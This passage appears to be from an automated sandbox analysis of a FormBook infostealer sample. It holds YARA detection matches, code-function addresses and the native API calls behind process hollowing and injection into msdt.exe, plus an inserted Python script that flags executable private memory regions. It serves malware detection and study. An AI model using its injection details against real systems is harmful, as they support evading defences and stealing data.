          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
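          The memory-dump identifiers in the two Yara lists above (Yara detected FormBook, and the community-rule matches) say where the payload lives, if you read their fields. The following is an added example, not part of the report or of the sandbox's tooling, that parses both identifier styles and flags regions that are executable and privately allocated. The field layout assumed for the .sdmp names (process index, stage, dump id, base address, protection, memory type) and the mapping of process index 15 to msdt.exe are assumptions taken from how the identifiers line up with the report's other entries; the Win32 protection and allocation-type constants are the documented ones.

```python
import re

# Constructed input: the dump identifiers listed under the report's Yara matches.
REPORT_SOURCES = [
    "5.2.divpCHa0h7.exe.400000.0.unpack",
    "1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack",
    "5.1.divpCHa0h7.exe.400000.0.unpack",
    "5.1.divpCHa0h7.exe.400000.0.raw.unpack",
    "5.2.divpCHa0h7.exe.400000.0.raw.unpack",
    "1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack",
    "0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp",
    "00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp",
    "00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp",
    "00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp",
    "00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp",
    "00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp",
    "0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp",
    "00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp",
    "0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp",
    "00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp",
]
# Assumption: process index 15 is msdt.exe, read off the report's "15_2_..." code-function entries.
KNOWN_IMAGES = {15: "msdt.exe"}

# Win32 page-protection and allocation-type constants (as reported by VirtualQuery).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed field layout of the sandbox's dump names: proc.stage.dumpid.base.protect.type.sdmp
SDMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
                     r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")
# Unpacked-PE names: proc.stage.image.base.index[.raw].unpack
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9A-Fa-f]+)\.(\d+)\.(raw\.)?unpack$")


def parse_dump_id(name):
    """Return a dict describing one memory-dump or unpacked-PE identifier."""
    m = SDMP_RE.match(name)
    if m:
        protect, mtype = int(m.group(5), 16), int(m.group(6), 16)
        return {"kind": "memory", "proc": int(m.group(1), 16), "stage": int(m.group(2), 16),
                "base": int(m.group(4), 16), "protect": protect,
                "protect_name": PAGE_PROTECT.get(protect & 0xFF, "unknown(0x%x)" % protect),
                "mem_type": MEM_TYPE.get(mtype, "unknown(0x%x)" % mtype)}
    m = UNPACK_RE.match(name)
    if m:
        return {"kind": "unpacked_pe", "proc": int(m.group(1)), "stage": int(m.group(2)),
                "image": m.group(3), "base": int(m.group(4), 16), "raw": m.group(6) is not None}
    raise ValueError("unrecognised identifier: %r" % name)


def executable_private_regions(identifiers, known_images=None):
    """Map process index -> image name and the executable MEM_PRIVATE bases found in it.

    Executable private memory is where unpacked or injected code ends up; a
    legitimately loaded module would be MEM_IMAGE instead.
    """
    parsed = [parse_dump_id(n) for n in identifiers]
    images = dict(known_images or {})
    for p in parsed:  # unpacked-PE names carry the image name, so use them to label processes
        if p["kind"] == "unpacked_pe":
            images.setdefault(p["proc"], p["image"])
    findings = {}
    for p in parsed:
        if p["kind"] != "memory":
            continue
        executable = bool(p["protect"] & 0xF0)  # the PAGE_EXECUTE* bits
        if executable and p["mem_type"] == "MEM_PRIVATE":
            entry = findings.setdefault(p["proc"], {"image": images.get(p["proc"], "unknown"), "bases": set()})
            entry["bases"].add(p["base"])
    return {proc: {"image": f["image"], "bases": sorted(f["bases"])} for proc, f in sorted(findings.items())}


if __name__ == "__main__":
    for proc, f in executable_private_regions(REPORT_SOURCES, KNOWN_IMAGES).items():
        print("process %d (%s): executable private memory at %s"
              % (proc, f["image"], ", ".join("0x%X" % b for b in f["bases"])))
```

          Run over the report's identifiers, the script singles out process 15 (msdt.exe) with RWX private regions at 0x2660000 and 0x2760000, which is the injected copy in a system process, and process 5 with an RWX private region at its own image base 0x400000, which is what a hollowed process looks like once the original image has been unmapped and replaced. Process 1's match at 0x3AB9000 is only PAGE_READWRITE, the loader's staging buffer rather than running code.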
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 1_2_0106D064
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 1_2_0106F296
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 1_2_0106F298
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 1_2_04F90D51
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 1_2_04F95A10
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0040102D
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00401030
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0041B8D3
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0041B8D6
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0041C98B
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0041C343
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00408C8B
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00408C90
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00402D8C
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00402D90
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F2B090
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FD1002
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F34120
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F1F900
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4EBB0
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F2841F
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F2D5E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FE1D55
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F10D20
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ADB090
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AD841F
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B81002
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AF2581
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ADD5E0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AC0D20
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ACF900
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B91D55
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AE6E30
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AFEBB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_0277C343
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_0277B8D6
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_0277B8D3
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_0277C98B
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_02762FB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_02768C90
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_02768C8B
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_02762D90
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_02762D8C
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 04ACB150 appears 35 times
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: String function: 00F1B150 appears 31 times
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_004185F0 NtCreateFile
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_004186A0 NtReadFile
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00418720 NtClose
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_004187D0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_004185EB NtCreateFile
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0041871A NtClose
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_004187CA NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F598F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F599A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F595D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F596E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F597A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F598A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F5B040 NtSuspendThread
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59820 NtEnumerateKey
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F599D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59950 NtQueueApcThread
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59A10 NtQuerySection
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F5A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59B00 NtSetValueKey
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F595F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59560 NtWriteFile
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F5AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F596D0 NtCreateKey
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B099A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B095D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B096E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B096D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A50 NtCreateFile,LdrInitializeThunk,15_2_04B09A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09780 NtMapViewOfSection,LdrInitializeThunk,15_2_04B09780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09FE0 NtCreateMutant,LdrInitializeThunk,15_2_04B09FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09710 NtQueryInformationToken,LdrInitializeThunk,15_2_04B09710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B098A0 NtWriteVirtualMemory,15_2_04B098A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B098F0 NtReadVirtualMemory,15_2_04B098F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09820 NtEnumerateKey,15_2_04B09820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0B040 NtSuspendThread,15_2_04B0B040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B095F0 NtQueryInformationFile,15_2_04B095F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B099D0 NtCreateProcessEx,15_2_04B099D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0AD30 NtSetContextThread,15_2_04B0AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09520 NtWaitForSingleObject,15_2_04B09520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09560 NtWriteFile,15_2_04B09560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09950 NtQueueApcThread,15_2_04B09950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A80 NtOpenDirectoryObject,15_2_04B09A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A20 NtResumeThread,15_2_04B09A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09610 NtEnumerateValueKey,15_2_04B09610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A10 NtQuerySection,15_2_04B09A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A00 NtProtectVirtualMemory,15_2_04B09A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09670 NtQueryInformationProcess,15_2_04B09670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A3B0 NtGetContextThread,15_2_04B0A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B097A0 NtUnmapViewOfSection,15_2_04B097A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09730 NtQueryVirtualMemory,15_2_04B09730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A710 NtOpenProcessToken,15_2_04B0A710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09B00 NtSetValueKey,15_2_04B09B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09770 NtSetInformationFile,15_2_04B09770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A770 NtOpenThread,15_2_04B0A770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09760 NtOpenProcess,15_2_04B09760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027786A0 NtReadFile,15_2_027786A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02778720 NtClose,15_2_02778720
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027787D0 NtAllocateVirtualMemory,15_2_027787D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027785F0 NtCreateFile,15_2_027785F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277871A NtClose,15_2_0277871A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027787CA NtAllocateVirtualMemory,15_2_027787CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027785EB NtCreateFile,15_2_027785EB